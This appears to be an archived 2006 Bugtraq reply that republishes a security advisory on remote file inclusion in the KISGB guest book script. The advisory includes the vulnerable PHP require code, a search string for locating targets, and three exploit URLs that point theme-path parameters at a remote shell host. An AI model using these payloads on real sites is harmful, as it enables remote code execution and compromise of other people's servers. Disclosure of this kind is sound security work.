Re: Multiple Remote Vulnerabilities in KISGB

To:	"0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@gmail.com>
Subject:	Re: Multiple Remote Vulnerabilities in KISGB
From:	3APA3A <3APA3A@SECURITY.NNOV.RU>
Date:	Sat, 23 Dec 2006 00:00:06 +0300
Cc:	bugtraq@zone-h.org, bugtraq@securityfocus.com, org@security.nnov.ru, full-disclosure@lists.grok.org.uk, <admin@zone-h.org>, <vuln@secunia.com>, <submit@milw0rm.com>
Delivered-to:	sp-com-lists@consult.net
Delivered-to:	bugtraq-list@securepoint.com
Delivered-to:	mailing list bugtraq@securityfocus.com
Delivered-to:	moderator for bugtraq@securityfocus.com
In-reply-to:	<558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
List-help:	<mailto:bugtraq-help@securityfocus.com>
List-id:	<bugtraq.list-id.securityfocus.com>
List-post:	<mailto:bugtraq@securityfocus.com>
List-subscribe:	<mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe:	<mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list:	contact bugtraq-help@securityfocus.com; run by ezmlm
Organization:	http://www.security.nnov.ru
References:	<558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
Reply-to:	3APA3A <3APA3A@SECURITY.NNOV.RU>

Dear 0o_zeus_o0 elitemexico.org,

 Thanks, published. http://www.security.nnov.ru/source13365.html

--Friday, December 22, 2006, 11:55:17 PM, you wrote to bugtraq@zone-h.org:

0eo> ###########################################################################
0eo> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
0eo> #
0eo> # Author: 0o_zeus_o0 ( Arturo Z. )
0eo> # Contact: zeus@diosdelared.com
0eo> # Website: www.diosdelared.com
0eo> # Date: 22/12/06
0eo> # Risk: critical
0eo> # Vendor Url: http://sourceforge.net/projects/kisgb,
0eo> http://ravenphpscripts.com
0eo> # Affected Software: Keep It Simple Guest Book
0eo> # search: inurl:kisgb , intitle:KISGB
0eo> #
0eo> #Info:
0eo> ##################################################################
0eo> #Bug is risky by since it is possible to be included I cosay malisioso
0eo> #that allows to see or to modify the archives
0eo> #code:
0eo> #if (isset($default_path_for_themes))
0eo> require("$default_path_for_themes/$theme");
0eo> #else require("$path_to_themes/$theme");
0eo> ##################################################################
0eo> #
0eo> #
0eo> #http://site/path/gbpath/authenticate.php?path_to_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/admin.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/upconfig.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> ##################################################################
0eo> #VULNERABLE VERSIONS
0eo> ##################################################################
0eo> # 5.0.0
0eo> #
0eo> ##################################################################
0eo> #Contact information
0eo> #0o_zeus_o0
0eo> #zeus@diosdelared.com
0eo> #www.diosdelared.com
0eo> ##################################################################
0eo> #greetz: S.S.M, sams, a mi beba
0eo> #Original Advisory: http://diosdelared.com/15.txt
0eo> ##################################################################


-- 
~/ZARAZA
Ñòðåëÿÿ âî âòîðîé ðàç, îí èñêàëå÷èë ïîñòîðîííåãî. Ïîñòîðîííèì áûë ÿ. (Òâåí)

<Prev in Thread]	Current Thread	[Next in Thread>
Re: Multiple Remote Vulnerabilities in KISGB, 3APA3A <= Re: Multiple Remote Vulnerabilities in KISGB, str0ke

Previous by Date:	SQID v0.2 - SQL Injection Digger., contact
Next by Date:	Re: Multiple Remote Vulnerabilities in KISGB, str0ke
Previous by Thread:	SQID v0.2 - SQL Injection Digger., contact
Next by Thread:	Re: Multiple Remote Vulnerabilities in KISGB, str0ke
Indexes:	[Date] [Thread] [Top] [All Lists]